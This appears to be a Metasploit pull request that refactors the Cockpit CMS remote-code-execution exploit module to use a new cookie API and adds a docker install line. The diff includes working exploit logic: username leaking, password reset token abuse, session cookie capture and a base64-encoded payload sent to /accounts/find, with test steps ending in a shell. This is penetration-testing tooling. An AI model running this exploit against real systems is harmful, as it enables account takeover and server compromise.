### PR TITLE
Converts Cockpit CMS to use new CookieJar API

### DIFF
--- a/documentation/modules/exploit/multi/http/cockpit_cms_rce.md
+++ b/documentation/modules/exploit/multi/http/cockpit_cms_rce.md
@@ -18,7 +18,13 @@ The following versions of Cockpit CMS contain all the necessary vulnerabilities 
 
 ### Install
 
-Follow https://blog.sommerfeldsven.de/how-to-install-cockpit-cms-on-nginx/
+Use docker:
+
+```
+docker run -p 8080:80 agentejo/cockpit:0.10.0
+```
+
+Or follow https://blog.sommerfeldsven.de/how-to-install-cockpit-cms-on-nginx/
 
 MAKE SURE TO BROWSE TO `/install` TO FINISH INSTALL!!
 

--- a/modules/exploits/multi/http/cockpit_cms_rce.rb
+++ b/modules/exploits/multi/http/cockpit_cms_rce.rb
@@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => 'application/json',
       'data' => JSON.generate({ 'auth' => { 'user' => un, 'password' => pass }, 'csfr' => Regexp.last_match(1) })
     )
-    
+
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
     fail_with(Failure::UnexpectedReply, "#{peer} - Login failed. This is unexpected...") if res.body.include?('"success":false')
     print_good("Valid cookie for #{un}: #{cookie_jar.cookies[0]}")

--- a/modules/exploits/multi/http/cockpit_cms_rce.rb
+++ b/modules/exploits/multi/http/cockpit_cms_rce.rb
@@ -186,6 +186,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => '/auth/login',
       'keep_cookies' => true
     )
+    login_cookie = res.get_cookies
 
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless /csfr\s+:\s+"([^"]+)"/ =~ res.body
@@ -193,13 +194,14 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'uri' => '/auth/check',
       'method' => 'POST',
+      'keep_cookies' => true,
       'ctype' => 'application/json',
       'data' => JSON.generate({ 'auth' => { 'user' => un, 'password' => pass }, 'csfr' => Regexp.last_match(1) })
     )
 
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
     fail_with(Failure::UnexpectedReply, "#{peer} - Login failed. This is unexpected...") if res.body.include?('"success":false')
-    print_good("Valid cookie for #{un}: #{cookie_jar.cookies}")
+    print_good("Valid cookie for #{un}: #{login_cookie}")
   end
 
   def gen_token(user)
@@ -207,6 +209,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_raw(
       'uri' => '/auth/requestreset',
       'method' => 'POST',
+      'keep_cookies' => true,
       'ctype' => 'application/json',
       'data' => JSON.generate({ user: user })
     )
@@ -219,6 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'uri' => '/accounts/find',
       'method' => 'POST',
+      'keep_cookies' => true,
       'ctype' => 'application/json',
       # this is more similar to how the original POC worked, however even with the & and prepend fork
       # it was locking the website (php/db_conn?) and throwing 504 or 408 errors from nginx until the session

--- a/modules/exploits/multi/http/cockpit_cms_rce.rb
+++ b/modules/exploits/multi/http/cockpit_cms_rce.rb
@@ -199,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
     fail_with(Failure::UnexpectedReply, "#{peer} - Login failed. This is unexpected...") if res.body.include?('"success":false')
-    print_good("Valid cookie for #{un}: #{cookie_jar.cookies[0]}")
+    print_good("Valid cookie for #{un}: #{cookie_jar.cookies}")
   end
 
   def gen_token(user)

--- a/modules/exploits/multi/http/cockpit_cms_rce.rb
+++ b/modules/exploits/multi/http/cockpit_cms_rce.rb
@@ -86,9 +86,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # https://github.com/agentejo/cockpit/blob/0.11.2/lib/MongoLite/Database.php#L432
     if check
       return (res.body.include?('Function should be callable') ||
-              # https://github.com/agentejo/cockpit/blob/0.12.0/lib/MongoLite/Database.php#L466
-              res.body.include?('Condition not valid') ||
-              res.body.scan(/string\(\d{1,2}\)\s*"([\w-]+)"/).flatten == [])
+        # https://github.com/agentejo/cockpit/blob/0.12.0/lib/MongoLite/Database.php#L466
+        res.body.include?('Condition not valid') ||
+        res.body.scan(/string\(\d{1,2}\)\s*"([\w-]+)"/).flatten == [])
     end
 
     res.body.scan(/string\(\d{1,2}\)\s*"([\w-]+)"/).flatten
@@ -183,22 +183,23 @@ class MetasploitModule < Msf::Exploit::Remote
   def login(un, pass)
     print_status('Attempting login')
     res = send_request_cgi(
-      'uri' => '/auth/login'
+      'uri' => '/auth/login',
+      'keep_cookies' => true
     )
+
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless /csfr\s+:\s+"([^"]+)"/ =~ res.body
-    cookie = res.get_cookies
-    res = send_request_raw(
+
+    res = send_request_cgi(
       'uri' => '/auth/check',
       'method' => 'POST',
       'ctype' => 'application/json',
-      'cookie' => cookie,
       'data' => JSON.generate({ 'auth' => { 'user' => un, 'password' => pass }, 'csfr' => Regexp.last_match(1) })
     )
+    
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
     fail_with(Failure::UnexpectedReply, "#{peer} - Login failed. This is unexpected...") if res.body.include?('"success":false')
-    print_good("Valid cookie for #{un}: #{cookie}")
-    cookie
+    print_good("Valid cookie for #{un}: #{cookie_jar.cookies[0]}")
   end
 
   def gen_token(user)
@@ -212,13 +213,12 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
   end
 
-  def rce(cookie)
+  def rce
     print_status('Attempting RCE')
     p = Rex::Text.encode_base64(payload.encoded)
-    send_request_raw(
+    send_request_cgi(
       'uri' => '/accounts/find',
       'method' => 'POST',
-      'cookie' => cookie,
       'ctype' => 'application/json',
       # this is more similar to how the original POC worked, however even with the & and prepend fork
       # it was locking the website (php/db_conn?) and throwing 504 or 408 errors from nginx until the session
@@ -265,7 +265,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     fail_with(Failure::UnexpectedReply, "#{peer} - Unable to get valid password reset token for user. Double check user") if good_token == ''
     password = reset_password(good_token, datastore['USER'])
-    cookie = login(datastore['USER'], password)
-    rce(cookie)
+    login(datastore['USER'], password)
+    rce
   end
 end


### PR DESCRIPTION
As above, convert's the [Cockpit CMS exploit](https://github.com/rapid7/metasploit-framework/pull/15058) to use the new [CookieJar API](https://github.com/rapid7/metasploit-framework/pull/14831).

## Verification

- [ ] Follow [installation instructions](https://blog.sommerfeldsven.de/how-to-install-cockpit-cms-on-nginx/) making sure to visit `/install` and finish the process.
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/cockpit_cms_rce`
- [ ] set rhost/port
- [ ] `check`
- [ ] `run` to get the list of users
- [ ] `set user [user]`
- [ ] `exploit`
- [ ] **Verify** you get a shell